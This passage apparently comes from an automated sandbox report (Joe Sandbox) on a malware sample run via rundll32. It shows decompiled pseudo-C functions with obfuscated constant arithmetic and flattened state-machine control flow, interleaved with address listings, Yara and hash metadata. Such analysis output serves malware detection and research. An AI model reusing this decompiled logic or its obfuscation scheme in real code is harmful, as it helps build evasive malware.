				_v128 = _v128 * 0x5a;
				_v128 = _v128 + 0xfbaf;
				_v128 = _v128 ^ 0x2ee5a62d;
				_v144 = 0xfc0c7f;
				_v144 = _v144 ^ 0xfdfaf442;
				_v144 = _v144 >> 1;
				_v144 = _v144 | 0x14143ad1;
				_v144 = _v144 ^ 0x7e977ecf;
				_v96 = 0xd1f565;
				_v96 = _v96 * 0x21;
				_v96 = _v96 ^ 0x1b12de47;
				_v104 = 0xb219e8;
				_v104 = _v104 | 0x75a31cc8;
				_v104 = _v104 ^ 0x75be6df4;
				_v80 = 0x6fb9b6;
				_v80 = _v80 * 0x3e;
				_v80 = _v80 ^ 0x1b001c4a;
				_v132 = 0x1154a0;
				_v132 = _v132 << 0xb;
				_v132 = _v132 + 0xfffffde8;
				_v132 = _v132 | 0xd1d436bb;
				_v132 = _v132 ^ 0xdbfeae5a;
				_v76 = 0x5374cd;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x0147cb67;
				_v140 = 0x35e68a;
				_v140 = _v140 + 0xffff467d;
				_v140 = _v140 * 0x7c;
				_v140 = _v140 ^ 0x566bba39;
				_v140 = _v140 ^ 0x4faa8078;
				_v124 = 0xf91357;
				_v124 = _v124 << 0xf;
				_v124 = _v124 + 0xf2e4;
				_v124 = _v124 ^ 0x89afe8a4;
				_v112 = 0xf055e4;
				_v112 = _v112 ^ 0x101963ca;
				_v112 = _v112 | 0x7be8ad21;
				_v112 = _v112 ^ 0x7be17431;
				_v84 = 0x17393b;
				_v84 = _v84 << 6;
				_v84 = _v84 ^ 0x05c81c43;
				_v120 = 0xf688ab;
				_v120 = _v120 / _t258;
				_v120 = _v120 * 0x2d;
				_v120 = _v120 ^ 0x00718a36;
				_v116 = 0xa21f51;
				_v116 = _v116 + 0x3c3b;
				_v116 = _v116 >> 0xa;
				_v116 = _v116 ^ 0x0006c391;
				_v88 = 0x51e239;
				_v88 = _v88 + 0x2ec0;
				_v88 = _v88 ^ 0x0058dd2b;
				_v136 = 0xa92d92;
				_v136 = _v136 >> 0xd;
				_v136 = _v136 ^ 0x0647b396;
				_v136 = _v136 ^ 0x20b7ff2f;
				_v136 = _v136 ^ 0x26fd7475;
				_v108 = 0xb50576;
				_t259 = 0x45;
				_v108 = _v108 / _t259;
				_v108 = _v108 ^ 0xb94dc178;
				_v108 = _v108 ^ 0xb943792d;
				_v148 = 0xb9b260;
				_t260 = 0x14;
				_v148 = _v148 / _t260;
				_v148 = _v148 * 0x3f;
				_v148 = _v148 >> 2;
				_v148 = _v148 ^ 0x009e914b;
				_v92 = 0x6e7d65;
				_v92 = _v92 | 0xb573042f;
				_v92 = _v92 ^ 0xb570b7bc;
				_v100 = 0xfd8f7e;
				_v100 = _v100 * 0x5d;
				_v100 = _v100 ^ 0x5c1db3f3;
				L1:
				while(_t227 != 0x3c16ad4) {
					if(_t227 == 0x3ccc1e9) {
						_t227 = 0x7dbf5b4;
						continue;
					}
					if(_t227 == 0x79abc1a) {
						_t229 =  &_v28;
						_t208 = E002DAEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
						_t263 =  &(_t263[4]);
						if(_t208 != 0) {
							_push(_t229);
							_push(_t229);
							_t222 = E002D7FF2(_v24);
							 *_t257 = _t222;
							if(_t222 != 0) {
								E002DED7E(_v108,  *_t257, _v148, _v28, _v24);
								_t263 =  &(_t263[3]);
								 *((intOrPtr*)(_t257 + 4)) = _v24;
								_t255 = 1;
							}
						}
						_t227 = 0xdaef9d5;
						continue;
					}
					if(_t227 == 0x7dbf5b4) {
						_t209 =  *((intOrPtr*)(_t225 + 4));
						_t233 =  *_t225;
						_v68 = _t209;
						_v72 = _t233;
						_t211 = _t209 - 1 + _t233;
						while(_t211 > _t233) {
							if( *_t211 == 0) {
								break;
							}
							_t211 = _t211 - 1;
						}
						_t212 = _t211 - _t233;
						_v68 = _t212;
						if(_t212 == 0) {
							L16:
							_t227 = 0xfc35b14;
							continue;
						}
						while(_v68 % _v144 != _v128) {
							_t163 =  &_v68;
							 *_t163 = _v68 - 1;
							if( *_t163 != 0) {
								continue;
							}
							goto L16;
						}
						goto L16;
					}
					if(_t227 == 0xdaef9d5) {
						E002E8519(_v92, _v100, _v64);
						L28:
						return _t255;
					}
					if(_t227 != 0xfc35b14) {
						L25:
						if(_t227 != 0xb843ed5) {
							continue;
						}
						goto L28;
					}
					if(E002D5E60( &_v72, _v96, _v104,  &_v64) == 0) {
						goto L28;
					}
					_t227 = 0x3c16ad4;
				}
				_t206 = E002D8B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
				_t263 =  &(_t263[4]);
				if(_t206 == 0) {
					_t227 = 0xdaef9d5;
					goto L25;
				}
				_t227 = 0x79abc1a;
				goto L1;
			}



















































                                                                                                                                  0x002d554f
                                                                                                                                  0x002d5558
                                                                                                                                  0x002d5560
                                                                                                                                  0x002d5561
                                                                                                                                  0x002d5568
                                                                                                                                  0x002d556f
                                                                                                                                  0x002d5570
                                                                                                                                  0x002d5572
                                                                                                                                  0x002d5577
                                                                                                                                  0x002d5582
                                                                                                                                  0x002d5584
                                                                                                                                  0x002d558f
                                                                                                                                  0x002d5592
                                                                                                                                  0x002d5598
                                                                                                                                  0x002d559c
                                                                                                                                  0x002d55a1
                                                                                                                                  0x002d55b0
                                                                                                                                  0x002d55b1
                                                                                                                                  0x002d55b5
                                                                                                                                  0x002d55bd
                                                                                                                                  0x002d55c5
                                                                                                                                  0x002d55cd
                                                                                                                                  0x002d55d5
                                                                                                                                  0x002d55d9
                                                                                                                                  0x002d55e1
                                                                                                                                  0x002d55e9
                                                                                                                                  0x002d55f6
                                                                                                                                  0x002d55fa
                                                                                                                                  0x002d5602
                                                                                                                                  0x002d560a
                                                                                                                                  0x002d5612
                                                                                                                                  0x002d561a
                                                                                                                                  0x002d5627
                                                                                                                                  0x002d562b
                                                                                                                                  0x002d5633
                                                                                                                                  0x002d563b
                                                                                                                                  0x002d5640
                                                                                                                                  0x002d5648
                                                                                                                                  0x002d5650
                                                                                                                                  0x002d5658
                                                                                                                                  0x002d5660
                                                                                                                                  0x002d5665
                                                                                                                                  0x002d566d
                                                                                                                                  0x002d5675
                                                                                                                                  0x002d5682
                                                                                                                                  0x002d5686
                                                                                                                                  0x002d568e
                                                                                                                                  0x002d5696
                                                                                                                                  0x002d569e
                                                                                                                                  0x002d56a3
                                                                                                                                  0x002d56ab
                                                                                                                                  0x002d56b3
                                                                                                                                  0x002d56bb
                                                                                                                                  0x002d56c3
                                                                                                                                  0x002d56cb
                                                                                                                                  0x002d56d3
                                                                                                                                  0x002d56db
                                                                                                                                  0x002d56e0
                                                                                                                                  0x002d56e8
                                                                                                                                  0x002d56f6
                                                                                                                                  0x002d56ff
                                                                                                                                  0x002d5703
                                                                                                                                  0x002d570b
                                                                                                                                  0x002d5713
                                                                                                                                  0x002d571b
                                                                                                                                  0x002d5720
                                                                                                                                  0x002d5728
                                                                                                                                  0x002d5730
                                                                                                                                  0x002d573a
                                                                                                                                  0x002d5742
                                                                                                                                  0x002d574a
                                                                                                                                  0x002d574f
                                                                                                                                  0x002d5757
                                                                                                                                  0x002d575f
                                                                                                                                  0x002d5767
                                                                                                                                  0x002d5775
                                                                                                                                  0x002d577a
                                                                                                                                  0x002d5780
                                                                                                                                  0x002d5788
                                                                                                                                  0x002d5790
                                                                                                                                  0x002d579c
                                                                                                                                  0x002d57a4
                                                                                                                                  0x002d57ad
                                                                                                                                  0x002d57b1
                                                                                                                                  0x002d57b6
                                                                                                                                  0x002d57be
                                                                                                                                  0x002d57c6
                                                                                                                                  0x002d57ce
                                                                                                                                  0x002d57d6
                                                                                                                                  0x002d57e3
                                                                                                                                  0x002d57e7
                                                                                                                                  0x00000000
                                                                                                                                  0x002d57ef
                                                                                                                                  0x002d5801
                                                                                                                                  0x002d591d
                                                                                                                                  0x00000000
                                                                                                                                  0x002d591d
                                                                                                                                  0x002d580d
                                                                                                                                  0x002d58ac
                                                                                                                                  0x002d58bb
                                                                                                                                  0x002d58c0
                                                                                                                                  0x002d58c5
                                                                                                                                  0x002d58da
                                                                                                                                  0x002d58db
                                                                                                                                  0x002d58dc
                                                                                                                                  0x002d58e1
                                                                                                                                  0x002d58e7
                                                                                                                                  0x002d5901
                                                                                                                                  0x002d590f
                                                                                                                                  0x002d5912
                                                                                                                                  0x002d5915
                                                                                                                                  0x002d5915
                                                                                                                                  0x002d58e7
                                                                                                                                  0x002d5916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5916
                                                                                                                                  0x002d5819
                                                                                                                                  0x002d5856
                                                                                                                                  0x002d5859
                                                                                                                                  0x002d585b
                                                                                                                                  0x002d5860
                                                                                                                                  0x002d5864
                                                                                                                                  0x002d586e
                                                                                                                                  0x002d586b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d586d
                                                                                                                                  0x002d586d
                                                                                                                                  0x002d5872
                                                                                                                                  0x002d5874
                                                                                                                                  0x002d5878
                                                                                                                                  0x002d5892
                                                                                                                                  0x002d5892
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5892
                                                                                                                                  0x002d587a
                                                                                                                                  0x002d588c
                                                                                                                                  0x002d588c
                                                                                                                                  0x002d5890
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5890
                                                                                                                                  0x00000000
                                                                                                                                  0x002d587a
                                                                                                                                  0x002d581d
                                                                                                                                  0x002d5975
                                                                                                                                  0x002d597b
                                                                                                                                  0x002d5987
                                                                                                                                  0x002d5987
                                                                                                                                  0x002d5829
                                                                                                                                  0x002d595b
                                                                                                                                  0x002d5961
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5967
                                                                                                                                  0x002d5849
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d584f
                                                                                                                                  0x002d584f
                                                                                                                                  0x002d5943
                                                                                                                                  0x002d5948
                                                                                                                                  0x002d594d
                                                                                                                                  0x002d5959
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5959
                                                                                                                                  0x002d594f
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 1t{$9Q$;<$e}n
                                                                                                                                  • API String ID: 0-2095593254
                                                                                                                                  • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                  • Instruction ID: 5de375f5fada758ac6ff612eac494f365f44aa4890e7d513b42f6d7974230386
                                                                                                                                  • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                  • Instruction Fuzzy Hash: 37B141B1118382CFC328CF22C58591BFBE1FBD4748F50891EF69696260D7B18A59CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E7DD5 Relevance: 5.2, Strings: 4, Instructions: 226COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E002E7DD5() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				unsigned int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				intOrPtr _t236;
				void* _t241;
				short* _t244;
				void* _t247;
				void* _t250;
				intOrPtr _t256;
				intOrPtr _t272;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int* _t283;

				_t283 =  &_v1156;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t250 = 0x1242b9;
				_v1056 = 0xc74a30;
				_v1052 = 0xdc93e6;
				_v1140 = 0x94ae82;
				_v1140 = _v1140 * 0x5d;
				_v1140 = _v1140 | 0xd08f5b59;
				_t278 = 0x3b;
				_v1140 = _v1140 / _t278;
				_v1140 = _v1140 ^ 0x042b78b4;
				_v1060 = 0xf2c7d8;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x000b32e4;
				_v1084 = 0xadf7c1;
				_v1084 = _v1084 >> 7;
				_v1084 = _v1084 ^ 0x0005ae79;
				_v1068 = 0x4ca2f2;
				_v1068 = _v1068 | 0x7f3e9315;
				_v1068 = _v1068 ^ 0x7f77e091;
				_v1148 = 0xfaa01c;
				_v1148 = _v1148 | 0x0a84fcb5;
				_t279 = 0x3d;
				_v1148 = _v1148 / _t279;
				_v1148 = _v1148 + 0xffff92ee;
				_v1148 = _v1148 ^ 0x0020489e;
				_v1104 = 0xbd50a4;
				_v1104 = _v1104 | 0x802f8c80;
				_v1104 = _v1104 ^ 0xe2a4d8db;
				_v1104 = _v1104 ^ 0x621899e9;
				_v1096 = 0x4ec4a;
				_t280 = 0x27;
				_v1096 = _v1096 / _t280;
				_v1096 = _v1096 ^ 0x000ca7f0;
				_v1156 = 0x496e13;
				_v1156 = _v1156 << 0xb;
				_v1156 = _v1156 + 0xffff34c4;
				_v1156 = _v1156 ^ 0xea67072b;
				_v1156 = _v1156 ^ 0xa10c07e0;
				_v1132 = 0x5417d7;
				_v1132 = _v1132 ^ 0x2d0a29d3;
				_v1132 = _v1132 * 0x11;
				_v1132 = _v1132 ^ 0x95d68b4c;
				_v1132 = _v1132 ^ 0x969bce68;
				_v1108 = 0x3d434d;
				_t83 =  &_v1108; // 0x3d434d
				_v1108 =  *_t83 * 0x5d;
				_v1108 = _v1108 + 0xbd1d;
				_v1108 = _v1108 ^ 0x16426462;
				_v1064 = 0x905f90;
				_v1064 = _v1064 << 7;
				_v1064 = _v1064 ^ 0x482aff2b;
				_v1076 = 0xa70fe8;
				_v1076 = _v1076 ^ 0x0f6696b3;
				_v1076 = _v1076 ^ 0x0fce7292;
				_v1144 = 0x5add64;
				_v1144 = _v1144 * 0x72;
				_v1144 = _v1144 >> 2;
				_v1144 = _v1144 + 0xffffbbe0;
				_v1144 = _v1144 ^ 0x0a105df6;
				_v1112 = 0xa934e1;
				_v1112 = _v1112 + 0xffff3dc6;
				_v1112 = _v1112 ^ 0xf71e7087;
				_v1112 = _v1112 ^ 0xf7bbdd65;
				_v1152 = 0xfe7bab;
				_v1152 = _v1152 + 0xffffe121;
				_v1152 = _v1152 << 7;
				_v1152 = _v1152 + 0xffffae88;
				_v1152 = _v1152 ^ 0x7f211c18;
				_v1092 = 0x242707;
				_v1092 = _v1092 >> 6;
				_v1092 = _v1092 ^ 0x0003c6d8;
				_v1136 = 0xebac4f;
				_v1136 = _v1136 + 0x4c15;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0xdf38e0e8;
				_v1136 = _v1136 ^ 0xdf3b1dfc;
				_v1120 = 0x4eb7ab;
				_v1120 = _v1120 << 2;
				_v1120 = _v1120 + 0xffff85cc;
				_v1120 = _v1120 ^ 0x01347c50;
				_v1088 = 0xc2f923;
				_v1088 = _v1088 * 0xf;
				_v1088 = _v1088 ^ 0x0b6c1f22;
				_v1080 = 0xbf02c1;
				_v1080 = _v1080 + 0xffffcd4c;
				_v1080 = _v1080 ^ 0x00bd8b7d;
				_v1128 = 0xfef10;
				_v1128 = _v1128 + 0xfa25;
				_v1128 = _v1128 + 0xffffb342;
				_v1128 = _v1128 + 0x2fe7;
				_v1128 = _v1128 ^ 0x00107547;
				_v1116 = 0x30091d;
				_v1116 = _v1116 | 0x682f5e67;
				_v1116 = _v1116 * 0xf;
				_v1116 = _v1116 ^ 0x1bb1960a;
				_v1100 = 0xdd7fbe;
				_v1100 = _v1100 >> 0xf;
				_v1100 = _v1100 + 0xffff26d4;
				_v1100 = _v1100 ^ 0xfff0a895;
				_v1072 = 0xd8d782;
				_v1072 = _v1072 + 0xffff857d;
				_v1072 = _v1072 ^ 0x00daabd2;
				_v1124 = 0x615b7c;
				_v1124 = _v1124 >> 0x10;
				_v1124 = _v1124 * 0x3d;
				_v1124 = _v1124 ^ 0x000147a1;
				L1:
				while(_t250 != 0x1242b9) {
					if(_t250 == 0x56337fc) {
						E002E6C49(_v1144, _v1112, _v1152, _v1092,  &_v520);
						_push(_v1088);
						_push( &_v520);
						_push(_v1120);
						E002F13AD(_v1136,  &_v1040, __eflags);
						_t283 =  &(_t283[6]);
						_t250 = 0x8d6676f;
						continue;
					}
					if(_t250 == 0x5f94146) {
						_push(_v1148);
						_push(_v1068);
						_t241 = E002EDCF7(_v1084, 0x2d1000, __eflags);
						_t256 =  *0x2f3e10; // 0x0
						_t272 =  *0x2f3e10; // 0x0
						E002D47CE(_t272 + 0x23c, _v1104, _t256 + 0x1c, _v1096, _v1156, _t241, _t256 + 0x1c, _v1132, _v1108);
						E002DA8B0(_v1064, _t241, _v1076);
						_t283 =  &(_t283[9]);
						_t250 = 0x56337fc;
						continue;
					}
					if(_t250 == 0x8d6676f) {
						_t244 = E002DB6CF( &_v1040, _v1080, _v1128, _v1116);
						__eflags = 0;
						 *_t244 = 0;
						return E002DB1C6( &_v1040, _v1100, _v1072, _v1124);
					}
					if(_t250 == 0xbcbde3e) {
						_t247 = E002E473C();
						L8:
						_t250 = 0x5f94146;
						continue;
					}
					if(_t250 != 0xf4317dc) {
						L15:
						__eflags = _t250 - 0xfb0317f;
						if(__eflags != 0) {
							continue;
						}
						return _t247;
					}
					_t247 = E002D3E3F();
					goto L8;
				}
				_t236 =  *0x2f3e10; // 0x0
				__eflags =  *((intOrPtr*)(_t236 + 0x450));
				if(__eflags == 0) {
					_t250 = 0xf4317dc;
					goto L15;
				}
				_t250 = 0xbcbde3e;
				goto L1;
			}













































                                                                                                                                  0x002e7dd5
                                                                                                                                  0x002e7ddb
                                                                                                                                  0x002e7de2
                                                                                                                                  0x002e7de7
                                                                                                                                  0x002e7dec
                                                                                                                                  0x002e7df4
                                                                                                                                  0x002e7dfc
                                                                                                                                  0x002e7e0d
                                                                                                                                  0x002e7e11
                                                                                                                                  0x002e7e1f
                                                                                                                                  0x002e7e24
                                                                                                                                  0x002e7e2a
                                                                                                                                  0x002e7e32
                                                                                                                                  0x002e7e3a
                                                                                                                                  0x002e7e3f
                                                                                                                                  0x002e7e47
                                                                                                                                  0x002e7e4f
                                                                                                                                  0x002e7e54
                                                                                                                                  0x002e7e5c
                                                                                                                                  0x002e7e64
                                                                                                                                  0x002e7e6c
                                                                                                                                  0x002e7e74
                                                                                                                                  0x002e7e7c
                                                                                                                                  0x002e7e88
                                                                                                                                  0x002e7e8d
                                                                                                                                  0x002e7e93
                                                                                                                                  0x002e7e9b
                                                                                                                                  0x002e7ea3
                                                                                                                                  0x002e7eab
                                                                                                                                  0x002e7eb3
                                                                                                                                  0x002e7ebb
                                                                                                                                  0x002e7ec3
                                                                                                                                  0x002e7ecf
                                                                                                                                  0x002e7ed2
                                                                                                                                  0x002e7ed6
                                                                                                                                  0x002e7ede
                                                                                                                                  0x002e7ee6
                                                                                                                                  0x002e7eeb
                                                                                                                                  0x002e7ef3
                                                                                                                                  0x002e7efb
                                                                                                                                  0x002e7f03
                                                                                                                                  0x002e7f0b
                                                                                                                                  0x002e7f18
                                                                                                                                  0x002e7f1c
                                                                                                                                  0x002e7f24
                                                                                                                                  0x002e7f2c
                                                                                                                                  0x002e7f34
                                                                                                                                  0x002e7f39
                                                                                                                                  0x002e7f3d
                                                                                                                                  0x002e7f45
                                                                                                                                  0x002e7f4d
                                                                                                                                  0x002e7f55
                                                                                                                                  0x002e7f5a
                                                                                                                                  0x002e7f62
                                                                                                                                  0x002e7f6a
                                                                                                                                  0x002e7f72
                                                                                                                                  0x002e7f7a
                                                                                                                                  0x002e7f87
                                                                                                                                  0x002e7f8b
                                                                                                                                  0x002e7f90
                                                                                                                                  0x002e7f98
                                                                                                                                  0x002e7fa0
                                                                                                                                  0x002e7fa8
                                                                                                                                  0x002e7fb0
                                                                                                                                  0x002e7fbd
                                                                                                                                  0x002e7fca
                                                                                                                                  0x002e7fd7
                                                                                                                                  0x002e7fdf
                                                                                                                                  0x002e7fe4
                                                                                                                                  0x002e7fec
                                                                                                                                  0x002e7ff4
                                                                                                                                  0x002e7ffc
                                                                                                                                  0x002e8001
                                                                                                                                  0x002e8009
                                                                                                                                  0x002e8011
                                                                                                                                  0x002e8019
                                                                                                                                  0x002e801e
                                                                                                                                  0x002e8026
                                                                                                                                  0x002e802e
                                                                                                                                  0x002e8036
                                                                                                                                  0x002e803b
                                                                                                                                  0x002e8043
                                                                                                                                  0x002e804b
                                                                                                                                  0x002e8058
                                                                                                                                  0x002e805c
                                                                                                                                  0x002e8064
                                                                                                                                  0x002e806c
                                                                                                                                  0x002e8074
                                                                                                                                  0x002e807c
                                                                                                                                  0x002e8084
                                                                                                                                  0x002e808c
                                                                                                                                  0x002e8094
                                                                                                                                  0x002e809c
                                                                                                                                  0x002e80a4
                                                                                                                                  0x002e80ac
                                                                                                                                  0x002e80b9
                                                                                                                                  0x002e80bd
                                                                                                                                  0x002e80c5
                                                                                                                                  0x002e80cd
                                                                                                                                  0x002e80d2
                                                                                                                                  0x002e80da
                                                                                                                                  0x002e80e2
                                                                                                                                  0x002e80ea
                                                                                                                                  0x002e80f2
                                                                                                                                  0x002e80fa
                                                                                                                                  0x002e8102
                                                                                                                                  0x002e810c
                                                                                                                                  0x002e8110
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8118
                                                                                                                                  0x002e812a
                                                                                                                                  0x002e81f0
                                                                                                                                  0x002e81f5
                                                                                                                                  0x002e8200
                                                                                                                                  0x002e8201
                                                                                                                                  0x002e8210
                                                                                                                                  0x002e8215
                                                                                                                                  0x002e8218
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8218
                                                                                                                                  0x002e8132
                                                                                                                                  0x002e8164
                                                                                                                                  0x002e816d
                                                                                                                                  0x002e8175
                                                                                                                                  0x002e8186
                                                                                                                                  0x002e819e
                                                                                                                                  0x002e81b1
                                                                                                                                  0x002e81c6
                                                                                                                                  0x002e81cb
                                                                                                                                  0x002e81ce
                                                                                                                                  0x00000000
                                                                                                                                  0x002e81ce
                                                                                                                                  0x002e813a
                                                                                                                                  0x002e825a
                                                                                                                                  0x002e8263
                                                                                                                                  0x002e826d
                                                                                                                                  0x00000000
                                                                                                                                  0x002e827c
                                                                                                                                  0x002e8142
                                                                                                                                  0x002e815d
                                                                                                                                  0x002e8155
                                                                                                                                  0x002e8155
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8155
                                                                                                                                  0x002e8146
                                                                                                                                  0x002e8239
                                                                                                                                  0x002e8239
                                                                                                                                  0x002e823f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e823f
                                                                                                                                  0x002e8150
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8150
                                                                                                                                  0x002e8222
                                                                                                                                  0x002e8227
                                                                                                                                  0x002e822e
                                                                                                                                  0x002e8237
                                                                                                                                  0x00000000
                                                                                                                                  0x002e8237
                                                                                                                                  0x002e8230
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: MC=$g^/h$|[a$/
                                                                                                                                  • API String ID: 0-1545830693
                                                                                                                                  • Opcode ID: d9bf2458a9a40e101157f4862dc6e4811edd92f04b16fd1a26a95f7a1cb3c2e7
                                                                                                                                  • Instruction ID: f347692879094bdbb68699119cc1ae0687cb5150b21b379a797b99c428053f5d
                                                                                                                                  • Opcode Fuzzy Hash: d9bf2458a9a40e101157f4862dc6e4811edd92f04b16fd1a26a95f7a1cb3c2e7
                                                                                                                                  • Instruction Fuzzy Hash: E6C110B11183818FC368CF26C58A51FFBE1FBC0758F508A1DF59696260D7B58A5ACF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002EA2E8 Relevance: 5.2, Strings: 4, Instructions: 201COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002EA2E8(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr* _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _t184;
				intOrPtr* _t189;
				intOrPtr _t193;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t198;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				intOrPtr _t226;
				void* _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int* _t231;

				_t198 = __ecx;
				_t231 =  &_v92;
				_v8 = __edx;
				_v24 = __ecx;
				_v28 = 0x24c7b9;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x498f7200;
				_v76 = 0x5897f7;
				_v76 = _v76 + 0xffffedf4;
				_v76 = _v76 << 0xf;
				_v76 = _v76 + 0x73e5;
				_v76 = _v76 ^ 0x42f7f56f;
				_v52 = 0x46ab19;
				_v52 = _v52 << 0xd;
				_t228 = 0xe611c04;
				_v20 = _v20 & 0x00000000;
				_t223 = 0x66;
				_v52 = _v52 / _t223;
				_v52 = _v52 ^ 0x0211beab;
				_v80 = 0x97c948;
				_v80 = _v80 ^ 0xfb972484;
				_v80 = _v80 << 2;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0xdb950905;
				_v44 = 0x96980f;
				_v44 = _v44 ^ 0xfeb8bb56;
				_v44 = _v44 ^ 0xfe2f3013;
				_v64 = 0x454cfa;
				_v64 = _v64 ^ 0x45fe36ac;
				_t224 = 0x43;
				_v64 = _v64 / _t224;
				_v64 = _v64 ^ 0x010b84d0;
				_v68 = 0xb73a82;
				_v68 = _v68 | 0xd419dac3;
				_t225 = 0x23;
				_v68 = _v68 / _t225;
				_v68 = _v68 ^ 0x061f1f3c;
				_v60 = 0xe80863;
				_v60 = _v60 * 7;
				_v60 = _v60 ^ 0x88fb80a0;
				_v60 = _v60 ^ 0x8ea007f2;
				_v40 = 0x80f530;
				_v40 = _v40 ^ 0xcef24483;
				_v40 = _v40 ^ 0xce7935e2;
				_v92 = 0x233377;
				_v92 = _v92 ^ 0x61e14959;
				_v92 = _v92 + 0xffffa5e4;
				_v92 = _v92 + 0xf94b;
				_v92 = _v92 ^ 0x61c7ad44;
				_v88 = 0xbad9cc;
				_v88 = _v88 | 0x5a2a09a8;
				_v88 = _v88 * 0x2f;
				_v88 = _v88 | 0xecc1c683;
				_v88 = _v88 ^ 0xecc3849f;
				_v56 = 0xb0d301;
				_v56 = _v56 + 0xa0bb;
				_v56 = _v56 << 0xf;
				_v56 = _v56 ^ 0xb9db0742;
				_v36 = 0xab48cf;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x1811952a;
				_v84 = 0x104632;
				_v84 = _v84 + 0x4a21;
				_v84 = _v84 ^ 0x8dbd106a;
				_v84 = _v84 + 0xfe54;
				_v84 = _v84 ^ 0x8daed025;
				_t226 = _v4;
				_t197 = _v8;
				_t230 = _v8;
				_v72 = 0x1611ea;
				_v72 = _v72 ^ 0xe055e86d;
				_v72 = _v72 >> 0xd;
				_v72 = _v72 >> 5;
				_v72 = _v72 ^ 0x0003993e;
				_v32 = 0x799484;
				_v32 = _v32 ^ 0xb4488d59;
				_v32 = _v32 ^ 0xb439947f;
				L1:
				while(1) {
					do {
						while(_t228 != 0x5161e0c) {
							if(_t228 == 0xb95f952) {
								_t229 = E002EC032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
								_t231 =  &(_t231[5]);
								_v20 = _t229;
								if(_t229 == 0) {
									L18:
									E002E8519(_v72, _v32, _t197);
								} else {
									_t204 = _v16;
									if(_t204 == 0) {
										L17:
										if(_t229 != 0) {
											_t189 = _v8;
											 *_t189 = _t197;
											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
